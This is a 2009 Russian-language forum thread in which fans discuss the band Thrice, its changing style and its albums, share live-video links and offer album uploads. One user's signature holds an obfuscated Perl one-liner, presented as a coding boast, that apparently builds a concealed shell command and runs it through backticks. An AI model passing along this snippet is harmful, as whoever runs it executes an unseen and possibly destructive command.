Добавлено: Пн Авг 24, 2009 8:42 am Заголовок сообщения: Thrice
Классная группа. Просто атас. Есть всё.
Начинали с панка, мелодик-хардкора, эмокора(чуть-чуть), плавно перешли в пост-поймичто, но очень хорошо, последние альбомы чуть-чуть местами похожи звучанием на Dredg, Radiohead Perfect Circle. В принципе у них есть всё, красивые гармонии, разноплановый вокал, оригинальные аранжировки, интересные текста) Вообще вот их желательно слушать полностью, ибо это очень показательный пример коллектива, который на протяжении своего существования эволюционировал в муз.плане, и продолжает). Вообщем они Epic, и совершенно точно не Fail.
Если есть желание ознакомиться поближе, более интимно(не со мной) то могу залить альбомчики)
А пока тольк тюбик))
Link - концертная версия(на кач-во не жалуйтесь) A torch To end Of All Torches 2001 год, Парни пока ещё молоды и "жарят"
Link - See You In The Shallows концертная версия с альбома The Illusion of Safety
Link - лайвик cold cash and colder hearts, вот с этого альбома уже начинаются эксперименты
Link - silhouette
Затем выходит Vheissu, оказался менее популярным во время выхода, зато критики только хвалили, а на нынешний момент альбом уже получил то что заслуживал, хотя я признаюсь сразу тоже не оценила, слишком разительными оказалсь жанровые рамки этого и предыдущего альбомов.
Link Of dust and nations лайвик Aol Sessions
А дальше, а а дальше они решили выпустить концептуальный 2cd альбом. Каждый диск состоит из 2 частей, то есть всего их четыре, каждая часть посвящена одной из 4-ех стихий, заманчиво?надеюсь да) Мне больше нравится часть "Воды" ибо там так всё спокойно меланхолично, очень красиво, и ЭмБиЕнТ есть, Digital Sea и The Whaler просто обязательны к прослушиванию))) Потом "Огонь", там жёстко и дэрзко, потом "Воздух" легко, особенно нравится песня "Silwer wings" там такой текст(проза)красивый, а как они спели ммм
Link Burn The Fleet, "Огонь"
И вот недавно вышел, точне пока ещё не вышел, а его нагло спиздили и выложили пираты, альбом The Beggars, если кратко, то Thrice просто-напросто не перестают удивлять, альбом стал ещё легче, всё упирается уже в гармонию и баланс и привычную для Thriсe красивую мелодику.
Вообщем, слушаем, отписываемся, "фапаем" кароче))))
надо торжественно поклясться _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
ALuserX
Оуу, спс) Если чё спрашивай буду продвигать хрошие группы)
Ps... почитала текст который писала в самом 1-посте, и мне стыдно столько ошибок... _________________ don't ask me how...
все заебало, наверно скачаю _________________ Everybody like to be
Lastly
у меня на винте 600 метров, завтра если почищу то скачаю обязательно _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
щас слушаю For Miles, она охуенна!!! _________________ Everybody like to be
Добавлено: Сб Авг 29, 2009 12:06 am Заголовок сообщения:
Lastly
седня дослушаю первый альбом, завтра остальные не успею прослушать, сейчас мне не надо, но может быть надо другим, или что то случится, и ты не сможешь залить его потом, так что залей) _________________ Everybody like to be
Добавлено: Сб Авг 29, 2009 12:08 am Заголовок сообщения:
Цитата:
что то случится
я имел ввиду не то, что тебя собьет машина или что то вроде, хотя и это возможно.... _________________ Everybody like to be